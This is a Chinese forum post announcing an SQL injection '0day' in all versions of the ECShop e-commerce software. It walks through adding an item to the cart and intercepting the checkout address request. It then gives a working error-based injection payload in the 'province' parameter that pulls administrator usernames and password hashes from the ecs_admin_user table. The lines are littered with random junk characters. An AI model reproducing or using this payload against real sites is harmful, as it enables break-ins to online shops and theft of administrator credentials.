找回密码
 立即注册
查看: 2951|回复: 0
打印 上一主题 下一主题

ECShop全版本SQL注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:19:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
感谢欠杀的黑盒1 X) V7 Q- [7 N
# M, ^- a9 Q. R( w# \7 Q

6 G% v! p# c/ ~. C: d) W. Y把任意商品加入购物车在填写配送地址那一页,有地区选择  b1 Y2 t* Z/ a

9 ?$ Q1 I8 e  u6 O& ^2 i, Xflow.php?step=consignee&direct_shopping=1
2 X8 y* I6 \; b& L比如省选择安徽5 w+ K: w0 G% n1 u1 w$ }3 [

& x& r, g1 j; B  r$ ~% \其中POST数据如下
* W0 E( x; o/ L; N, q8 P
9 L. A$ X4 m) G" {3 |$ L7 Tcountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
9 g! u1 y/ Y# x$ Y$ i# E改成
* y% i3 V+ t. p! F, s. p * l! E; u1 p2 _+ n
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
, u$ a) q9 m" m5 ?- P( @ps:详细的方法,用火狐tamper data插件……..即可改post内容…..7 L! t0 C3 Q/ u' H* Y! K

: ]. A5 i9 D1 f9 G) L先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
! m# g- S- x  _# M% D! P
% r- k, E: p& \就会回显错误页面了。。。。* F/ U& o$ V" m+ S7 X
% o' y- y. c( [( g8 u& o- Y; T
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的4 R$ ^7 H3 v' r7 D% {! @+ o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表